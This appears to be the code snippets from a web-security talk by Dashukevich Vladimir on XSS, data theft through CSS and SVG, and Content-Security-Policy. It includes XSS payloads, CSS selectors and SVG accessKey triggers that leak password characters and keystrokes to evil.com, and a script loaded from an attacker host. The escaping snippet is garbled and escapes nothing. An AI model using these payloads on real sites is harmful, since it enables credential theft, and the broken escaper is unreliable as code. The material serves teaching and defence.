Dashukevich Vladimir
<div style='{{css}}'>
<input value='{{value}}'>
Hello, {{title}}
{{image}}
</div>
<div style='{{css}}'>
<input value='{{value}}'>
Hello, {{title}}
{{image}}
</div>
<div style='{{css}}'>
<input value='' onmouseover='alert(1)'>
Hello, {{title}}
{{image}}
</div>
<div style='{{css}}'>
<input value='{{value}}'>
Hello, {{title}}
{{image}}
</div>
<div style='{{css}}'>
<input value='{{value}}'>
Hello, <img src='a.png' onerror='alert(1)'>
{{image}}
</div>
<div style='{{css}}'>
<input value='{{value}}'>
Hello, {{title}}
{{image}}
</div>
<input type='password' id='hi' value='abcd'>
#hi[value^="a"] {
background-color: url(//evil.com/?v=a);
}
#hi[value^="b"] {
background-color: url(//evil.com/?v=b);
}
<div style='{{css}}'>
<input value='{{value}}'>
Hello, {{title}}
{{image}}
</div>
<defs>
<path id='example' d="...">
</defs>
<use xlink:href="#example" visibility="hidden">
<set begin="0s" end="1s"
attributeName="visibility" to="visible">
</use>
<defs>
<path id='example' d="...">
</defs>
<use xlink:href="#example" visibility="hidden">
<set begin="accessKey(a)"
attributeName="xlink:href" to="//evil.com/?a">
</use>
<set begin="accessKey(a)" attributeName="xlink:href"
to="//evil.com/?a">
<set begin="accessKey(b)" attributeName="xlink:href"
to="//evil.com/?b">
...
<set begin="accessKey(x)" attributeName="xlink:href"
to="//evil.com/?x">
str.replace(/&/g, '&')
.replace(/"/g, '"')
.replace(/'/g, ''')
.replace(/</g, '<')
.replace(/>/g, '>');
Content-Security-Policy:
default-src 'none';
frame-src mysite.com;
img-src 'self' *.google.com;
script-src 'self' 'unsafe-inline' 'unsafe-eval';
report-uri https://mysite.com/report;
Content-Security-Policy:
default-src 'none';
frame-src mysite.com;
img-src 'self' *.google.com;
script-src 'self' 'unsafe-inline' 'unsafe-eval';
report-uri https://mysite.com/report;
Content-Security-Policy:
default-src 'none';
frame-src mysite.com;
img-src 'self' *.google.com;
script-src 'self' 'unsafe-inline' 'unsafe-eval';
report-uri https://mysite.com/report;
Content-Security-Policy:
default-src 'none';
frame-src mysite.com;
img-src 'self' *.google.com;
script-src 'self' 'unsafe-inline' 'unsafe-eval';
report-uri https://mysite.com/report;
Content-Security-Policy:
default-src 'none';
frame-src mysite.com;
img-src 'self' *.google.com;
script-src 'self' 'unsafe-inline' 'unsafe-eval';
report-uri https://mysite.com/report;
Content-Security-Policy:
default-src 'none';
frame-src mysite.com;
img-src 'self' *.google.com;
script-src 'self' 'unsafe-inline' 'unsafe-eval';
report-uri /report?report=true;
<script src="//evel.com/steel.js"></script>
Content-Security-Policy:
default-src 'none';
frame-src mysite.com;
img-src 'self' *.google.com;
script-src 'self' https://mysite.com;
report-uri /report?report=true;
<script src="//evel.com/steel.js"></script>
Content-Security-Policy:
default-src 'none';
frame-src mysite.com;
img-src 'self' *.google.com;
script-src 'self' https://script.com;
report-uri /report?report=true;
{
"csp-report": {
"document-uri": "https://mysite.com/cats",
"referrer": "https://evel.com",
"blocked-uri": "https://evil.com/steel.js" ,
"violated-directive": "script-src 'self' https://script.com;",
"original-policy": ** all policy **
}
}
<img src="https://my.google.com/cat.png">
Content-Security-Policy:
default-src 'none';
frame-src mysite.com;
img-src 'self' *.google.com;
script-src 'self' https://mysite.com;
report-uri /report?report=true;
<img src="https://my.google.com/cat.png">
Content-Security-Policy:
default-src 'none';
frame-src mysite.com;
img-src 'self' *.google.com;
script-src 'self' https://mysite.com;
report-uri /report?report=true;
https://mysite.com/fontello.woff
Content-Security-Policy:
default-src 'none';
frame-src mysite.com;
img-src 'self' *.google.com;
script-src 'self' https://mysite.com;
report-uri /report?report=true;
https://mysite.com/fontello.woff
Content-Security-Policy:
default-src 'none';
frame-src mysite.com;
img-src 'self' *.google.com;
script-src 'self' https://mysite.com;
report-uri /report?report=true;
<script>
alert("Hello world")
</script>
Content-Security-Policy:
script-src 'self' 'nonce-Nc3n83cnSAd3wc3Sasdfn939hc3';
report-uri /report?report=true;
<script>
alert("Hello world")
</script>
Content-Security-Policy:
script-src 'self' 'nonce-Nc3n83cnSAd3wc3Sasdfn939hc3';
report-uri /report?report=true;
<script nonce="Nc3n83cnSAd3wc3Sasdfn939hc3">
alert("Hello world")
</script>
Content-Security-Policy:
script-src 'self' 'nonce-Nc3n83cnSAd3wc3Sasdfn939hc3';
report-uri /report?report=true;
<script nonce="Nc3n83cnSAd3wc3Sasdfn939hc3">
alert("Hello world")
</script>
Content-Security-Policy:
script-src 'self' 'nonce-Nc3n83cnSAd3wc3Sasdfn939hc3';
report-uri /report?report=true;